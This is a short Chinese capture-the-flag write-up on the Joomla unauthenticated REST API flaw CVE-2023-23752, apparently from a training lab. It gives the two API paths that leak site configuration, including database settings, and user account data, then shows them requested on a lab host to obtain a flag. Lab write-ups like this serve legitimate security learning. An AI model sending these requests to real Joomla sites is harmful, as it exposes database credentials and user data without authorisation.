首先奉上大佬的wp表示尊敬:(很詳細)[ 漏洞復現篇 ] Joomla未授權訪問Rest API漏洞(CVE-2023-23752)_joomla未授權訪問漏洞(cve-2023-23752)-CSDN博客
知識點
- Joomla版本為4.0.0 到 4.2.7 存在未授權訪問漏洞
- Joomla是一套全球知名的內容管理系統(CMS),其使用PHP語言加上MySQL數據庫所開發,可以在Linux、Windows、MacOSX等各種不同的平臺上運行
- 未授權api路徑
- 獲取網站的配置文件信息
- /api/index.php/v1/config/application?public=true
- 獲取賬號密碼信息
- api/index.php/v1/users?public=true
- 其他api接口
-
詳見開頭大佬的wp結尾
-
- 獲取網站的配置文件信息
-
REST?API
-
規定固定格式的應用程序接口:將用戶操作轉為http請求的api
-
詳見:一文徹底弄懂REST API - 知乎
-
解題思路
題目地址:Home
點擊連接進入到網頁初始頁面
可以看到旁邊有很多的鏈接:登錄界面,找回密碼界面,找回用戶名界面
通過測試發現這些界面無法進入,到這里已廢,只能求助大佬的wp
發現了未授權的接口鏈接:
獲取網站的配置文件信息:
/api/index.php/v1/config/application?public=true
將該路徑添加到網站后面發現成功得到了配置文件的信息:數據庫的相關配置信息
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
獲取網站的賬號密碼信息:
api/index.php/v1/users?public=true
通過構造訪問得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true
10